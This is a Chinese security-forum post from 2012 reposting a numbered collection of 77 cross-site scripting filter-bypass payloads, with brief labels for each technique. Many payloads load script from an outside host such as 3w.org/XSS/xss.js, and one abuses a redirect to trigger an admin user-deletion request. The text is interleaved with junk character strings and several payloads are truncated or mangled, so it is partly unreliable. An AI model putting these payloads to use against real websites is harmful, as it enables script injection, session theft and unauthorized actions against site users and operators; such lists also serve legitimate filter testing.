貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
' \4 q4 Q3 K1 |: j( k9 Q _) {) o4 f9 t4 t% M3 y* Y
(1)普通的XSS JavaScript注入8 x7 R9 G' N5 [; ^3 {3 j8 g! \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 Z# C, z% f0 O! X5 C4 j% |
5 r# y8 F5 |# O( I, @( N2 Y% E
(2)IMG标签XSS使用JavaScript命令
4 M4 R2 Y% C! S3 x+ g2 U <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) X/ g2 E. g- H y6 o( p) C/ g
# h2 M, _$ d7 _+ e7 ?
(3)IMG标签无分号无引号7 G. L: c" ~9 l: n1 p7 d" T3 m G) F
<IMG SRC=javascript:alert(‘XSS’)>, |( a" \; y% Q- M3 F
y4 X+ m2 b S. P0 T u9 c (4)IMG标签大小写不敏感' \/ _% T' P4 I$ R# W
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& I: m" I7 P5 I9 d1 i2 m; z" L5 x, }3 K5 ]+ c* ^+ i& p/ \
(5)HTML编码(必须有分号)
2 b9 h1 s/ E9 X" b! ^ ~) J <IMG SRC=javascript:alert(“XSS”)>" M( ?6 |2 S* p7 y: S+ P
/ P" v# ^& b; H* H# t. l0 W
(6)修正缺陷IMG标签( X# X2 G3 l( m0 }( \( f5 d
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
) ^5 S* \: m2 ^6 I V+ W& q# K+ }; G& T
(7)formCharCode标签(计算器)
7 O1 a; K/ k2 g2 M* M0 P4 z; [ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 a# c$ L% c; t7 y5 U# ^
$ k+ L) } h$ p8 F1 [ (8)UTF-8的Unicode编码(计算器)
9 f, O; ^7 C5 H& @( e <IMG SRC=jav..省略..S')>
3 ?( H. T* a$ v! l
- m$ a. j6 |) M (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 i- ?3 }: g5 D$ |- Y: M <IMG SRC=jav..省略..S')>3 ^' [1 w& T8 ~/ Q S1 Z
, D: G z4 T! K0 E |
(10)十六进制编码也是没有分号(计算器)
' l9 _1 T/ |+ i" a* q, I! B <IMG SRC=java..省略..XSS')>
% j& Y' x1 P: @4 H# }3 K6 o! ]
. [" }+ g$ @ q (11)嵌入式标签,将Javascript分开$ L, P: h' ?/ {+ p2 w8 x
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 a; x( y2 O! w) @: `
3 Y% k$ ~& }$ @. I1 P/ e8 f* x (12)嵌入式编码标签,将Javascript分开
( _, t/ K. V. e" ~ <IMG SRC=”jav ascript:alert(‘XSS’);”># f! U; |8 a' c# I1 c2 T
1 j. K1 W( n' [0 m9 J/ b
(13)嵌入式换行符0 p2 C6 ^$ U3 D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
H6 g* K; }8 B" w K% y Q" q3 l* [
(14)嵌入式回车! V# X' U2 v3 b7 d! m7 \) T
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 Q7 D% O! \; q* f4 E- R' |; |
% G) [! o) _# W8 m/ L (15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 A! a) I; \; ?; c: @# H4 K <IMG SRC=”javascript:alert(‘XSS‘)”>' Z. C, g" D1 }' {" R7 L0 i+ `* R. Q. U
" W" v O$ X9 X
(16)解决限制字符(要求同页面). o, K2 j+ R D8 K
<script>z=’document.’</script>
' R# T8 Q" Y9 B5 j <script>z=z+’write(“‘</script>
7 W5 |' c" ~3 b' v <script>z=z+’<script’</script>
; o$ e/ T) X4 p <script>z=z+’ src=ht’</script>$ Y- Y# y( q+ c% t/ P
<script>z=z+’tp://ww’</script>
: b9 D4 p: Q* w( ? <script>z=z+’w.shell’</script>
& k( S" m8 `8 }# M <script>z=z+’.net/1.’</script>
) q9 m9 O. L2 i; w, ` <script>z=z+’js></sc’</script>
' U1 S; R$ {, I4 X3 t3 i; F <script>z=z+’ript>”)’</script>
@9 ~0 `% a- L <script>eval_r(z)</script>6 i7 ~3 ^$ ^+ n( t+ h+ L% V+ t2 _, R
: Q4 L, W9 v9 t0 C (17)空字符" d: J: C- K! I0 [4 m$ k
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 B$ F4 i; o2 g3 ?5 \" v
7 H+ I6 r# ], d; f! @: Q (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 M o. j& b) y \ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
# o1 H9 K" M* s) d# h; _
1 ]. v8 f. R6 K( A! ^ (19)Spaces和meta前的IMG标签
0 u" U0 L+ _+ G$ d; p0 i9 M# s <IMG SRC=” � javascript:alert(‘XSS’);”>: U; f8 F1 I5 B
2 f2 ]" t: z# N, D% Y# ?
(20)Non-alpha-non-digit XSS
$ t6 a: W$ o) f3 w8 U) c <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># m. ?: h* X% k" X1 m) k8 l
& h7 i* T. T# j _; [! v
(21)Non-alpha-non-digit XSS to 2
" ~" G8 q5 r- m- {* I. G8 O <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% S: h; A; e: g! r
$ H6 w, \7 A" s
(22)Non-alpha-non-digit XSS to 3. z* g3 z& @% m4 y; _' b" f0 [
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>: g- D/ `4 U$ x j" W5 X
+ H3 c1 e0 ~$ X
(23)双开括号2 O. y) p; ?3 \
<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 p) x% Y# y: L
3 F. K" D* X( q! P (24)无结束脚本标记(仅火狐等浏览器)
( Q5 p0 z4 d& b& W% A B <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
Q' N% l; D) N' ~4 ~9 v: P
, |1 s! w/ n9 ~5 ?9 P) J/ p (25)无结束脚本标记28 [- n: [2 M) K" U: E3 g- I
<SCRIPT SRC=//3w.org/XSS/xss.js>
! B/ q0 c) F+ p4 F. j
( G5 X6 ?! u& [9 l. D (26)半开的HTML/JavaScript XSS
: t: B3 U, X6 G$ b <IMG SRC=”javascript:alert(‘XSS’)”9 @& h4 h) ^+ d* n, C* k2 e
. d, r3 q0 S& I% L (27)双开角括号
Y( e6 j1 X4 R+ s <iframe src=http://3w.org/XSS.html <
- g0 r |( _/ u3 @6 U( t5 q7 ~, \% y4 `& k, m5 m9 ?7 ^. T2 f9 D2 \. v
(28)无单引号 双引号 分号
$ l/ p) ~; w+ f8 i! r/ } <SCRIPT>a=/XSS/
) B. n& J q5 g$ N4 } alert(a.source)</SCRIPT>
. I( i' b% L: ~. @
! m6 g1 Z, E& W0 A (29)换码过滤的JavaScript
5 T9 i8 U) e& V+ w& } \”;alert(‘XSS’);//
, \8 ~0 _3 {1 A0 _8 T4 ~! x. W# p( W( u1 W D, S+ D* E6 j
(30)结束Title标签7 |. M4 a! h M- |
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>) ~+ z1 r. q% K# {% {
+ V; c% p/ L- @: W (31)Input Image6 z: ~) A2 {) J4 ~3 s; L
<INPUT SRC=”javascript:alert(‘XSS’);”>8 Y. ^. o, h. A) J
9 {; N7 o5 u) k& i' o2 T' J
(32)BODY Image
, Q0 c: K0 T% I1 B( U7 j <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% V Y* f, m, s$ Q
8 k, q/ K" d7 ~2 w (33)BODY标签
- _/ c! G8 d% [$ N1 p6 c <BODY(‘XSS’)>/ b1 }: a. j) c6 P$ |$ u2 O4 K, o3 _
( z+ k- j9 |# n (34)IMG Dynsrc
7 n+ `/ F1 ]' ]4 r0 I <IMG DYNSRC=”javascript:alert(‘XSS’)”># p/ _" {1 X# ^( d0 }9 Y
) t& g# D5 v2 s) k3 h (35)IMG Lowsrc) f+ U5 J4 a y
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
/ u2 a% a3 W! B! a
, Z7 w$ a) l" w (36)BGSOUND: L; ^3 { a; x: E" q8 Z T
<BGSOUND SRC=”javascript:alert(‘XSS’);”>8 F( f0 ^4 o5 I
# n/ o8 `; V W6 [# F2 C
(37)STYLE sheet
0 u, P7 }: W8 F) N. o <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# U) o) c) x* f6 d+ _9 E: r: b
+ [- e% P6 \& N8 o3 Y. D (38)远程样式表
) o# r% @8 c" [0 n" {5 o" w; s# x <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ e; _. b8 Z7 F, @
. L7 H! i8 ^3 t5 B' y
(39)List-style-image(列表式)
5 R5 y* F, S4 Y0 t3 o <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
J7 g" _$ `' C# Y+ ~: ]" f4 ^: Q: V
(40)IMG VBscript$ g- R8 D7 C) I2 c
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS" j1 x# I. [9 L$ ~8 W
% @6 j, S8 Z/ t; N3 h/ J7 n
(41)META链接url
& Y; |; S4 j$ @2 O% ]; t <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
' _- b" V: z) c" h0 M
& U1 Y9 }5 e9 k% [" D (42)Iframe
& [# v+ O0 ?( B. d9 q" _ <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
+ s C( L6 G- N( G, N1 _% w4 ~' _7 n$ V# Z
(43)Frame9 o$ A" @' A) Q& f
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>+ h6 V3 g7 x6 r/ B3 {9 n, M
6 _5 a8 x: t1 P( ]
(44)Table
* a, h$ ^- \ k <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. J8 W8 Q* s3 U
% p+ g: ]. c0 z" r
(45)TD
) y8 P1 S, z" d: K <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- |" X8 h' g# x: s" h" p& D+ Q
: T' R v+ w; E/ R- V; g (46)DIV background-image
) e: n5 P( Y8 n b <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; ]% E8 g$ l6 M4 g( E2 N& X
7 m! t2 d0 D I/ v- |7 _' a (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
2 ] D9 F; r* V3 n& ?+ E" S <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>& E L3 M% {2 O3 m% I
# L3 O0 @4 m/ h+ {1 u (48)DIV expression: i( ]8 P0 k4 i# r6 q+ O; N
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>% j8 M# j9 F8 ^; t& c0 h
+ E6 h2 G5 ]8 ^4 [- E+ g0 J5 R (49)STYLE属性分拆表达
O1 K1 T- x3 e# @% z5 X" T) O' A <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ T& K6 c: ~! K+ I9 ^. ~2 ?
, t( J4 q9 V! d4 }4 U9 X. z" ^ (50)匿名STYLE(组成:开角号和一个字母开头)
8 i) o. r- g0 C4 o <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' Y* C9 c; d* I! r9 p
; l- D! w& Q# n) c; @8 F+ z! [ w
(51)STYLE background-image
- V! w' ?- G. o D. T <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>: x, a( _2 S6 ]
; G1 a% I: Q1 L4 s0 F7 S. c
(52)IMG STYLE方式3 h) J9 {1 i7 h! p! G
exppression(alert(“XSS”))’>
1 h. j/ b8 m/ {- Y$ B j0 O5 W$ a% b# p- d2 Q; F9 a' [8 \
(53)STYLE background3 {- c6 W! B4 x: {$ ?& d- e: G
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
: C" V. r6 t% r2 j
$ y5 Z8 g4 B s/ i2 k6 w2 K (54)BASE( M5 D9 B2 {/ I, T+ t" Z
<BASE HREF=”javascript:alert(‘XSS’);//”>+ C# D4 B: V7 Q5 T: @9 J5 P1 U
7 `/ Y" L6 F0 |6 x# s
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
J& e/ a$ m7 l: t <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 X9 L- K% F, b' a8 o
8 I9 G$ i6 v1 S. J2 a! P- E* I8 J( A$ ~
(56)在flash中使用ActionScrpt可以混进你XSS的代码0 ]) v( e, _, d9 o+ s1 t
a=”get”;
/ P6 S2 q. E: p1 d5 A1 y5 q% b* Q b=”URL(\”";
1 N: z7 Q* B) g. t, x7 { c=”javascript:”;% p( Q5 P& K. ]% g. e
d=”alert(‘XSS’);\”)”;! O+ |0 ` ~6 Y( g) C& |- `
eval_r(a+b+c+d);
8 R8 M. x, E: ^& S
1 ~! p' D% P0 c$ r (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* Y- n& Y0 q& ~6 n <HTML xmlns:xss>
" f3 E/ ^" u& n8 q' Z. r <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>6 M$ d0 H9 s2 M( p9 d0 c/ }7 u
<xss:xss>XSS</xss:xss>( `! c- ?& x( E/ R5 u
</HTML>
1 l: _+ P, ]+ {% D& h0 Q6 C, f
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用8 ~. `; K& I0 `6 X8 V5 | H
<SCRIPT SRC=””></SCRIPT>
$ S! F4 v4 {- |8 H. {0 o# |0 U* F$ t- T; n1 P
(59)IMG嵌入式命令,可执行任意命令
( \' ]1 ?; O7 M" K T <IMG SRC=”http://www.XXX.com/a.php?a=b”>! w+ N* e$ K- R0 ?
! Q- O1 V( F2 E' O# W- Y
(60)IMG嵌入式命令(a.jpg在同服务器)* Q; H6 v \8 e2 }3 [! m+ U- R
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& i" k0 U) U; _& L J. s- y: q0 d( v& X$ s9 q
(61)绕符号过滤
4 g: T& t0 Z0 v4 S, D, n <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 t, q# m7 o' \& a
6 E' }, ]# u4 |8 `$ b: V4 E |: @
(62)
* Q% m Y( w- U <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT> J5 f5 `6 f0 r( m( r* d& i
: Q2 J8 B, y( L( S2 [8 ~. }
(63)
3 ]. m$ i9 m; [( r) s* \ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>8 x+ B- L' e4 u5 v/ _( A
1 H+ W1 x0 z' l: c
(64) b$ E2 p& |9 J" o
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
+ R+ t) H* D, t4 H/ W+ X* N% M) T/ w* f. N( x
(65)" o" G% R" {# E
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. Z% X" b8 N( u* Y, G1 s
( @" z# F+ C: w+ z8 x (66), ?: i. w- G9 x4 d
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" D& t& _) r9 ^
$ B6 B8 K$ x, A- j, A
(67); ?; K6 i$ G* g8 J1 b; E/ n& {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
$ |: M. a8 E8 |% G( f$ W' e j3 _; a
(68)URL绕行& n4 s" z- \9 F& l
<A HREF=”http://127.0.0.1/”>XSS</A>1 u0 o0 d( l0 V6 m+ ~. e3 l2 Q
6 d% j* y" R5 Y1 }7 n0 o: k
(69)URL编码* Z! n1 A* B9 U2 N- s+ r+ ?
<A HREF=”http://3w.org”>XSS</A>; S5 h: l h' b4 U+ g# G
/ \0 E* s7 I' G
(70)IP十进制! g1 M0 L& n q" X6 [
<A HREF=”http://3232235521″>XSS</A>
1 T: ]+ }+ `, }+ v9 T1 P& z! E2 } p0 D/ }( @3 Y
(71)IP十六进制
" a) y F5 ]9 Y. ?- I <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ A7 H! }5 S4 B; P- s
" F% e$ P( p! t/ c (72)IP八进制
2 J: h5 R" Y& k5 [% Q: s <A HREF=”http://0300.0250.0000.0001″>XSS</A>
. Z. D* J5 B) R! D' y+ j6 c, O5 l: f8 u
(73)混合编码
5 a; d4 @# e; q <A HREF=”h
' I, r8 {5 f! N tt p://6 6.000146.0×7.147/”">XSS</A>
6 S0 N c1 |0 m/ S2 ]+ Q; ^) U: E! {, t; f
(74)节省[http:]( {( T D! m& S8 U# d% J" D0 x
<A HREF=”//www.google.com/”>XSS</A>
7 w( n: w. q* ?/ y1 _
( F; x2 ^% I/ f$ Q5 Q+ [% n (75)节省[www]
$ ~/ z% k. N; P <A HREF=”http://google.com/”>XSS</A>
; R, R* D( N% R' b8 J8 E3 r' R2 h, L1 H' |% Q# R
(76)绝对点绝对DNS D3 u8 f9 a! T4 q
<A HREF=”http://www.google.com./”>XSS</A>
. y2 u7 t: k0 q# e! a! [5 g9 B) R) u9 O- {( k; D
(77)javascript链接) U9 I0 p/ D5 E; H2 j/ g0 Q5 t. f
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对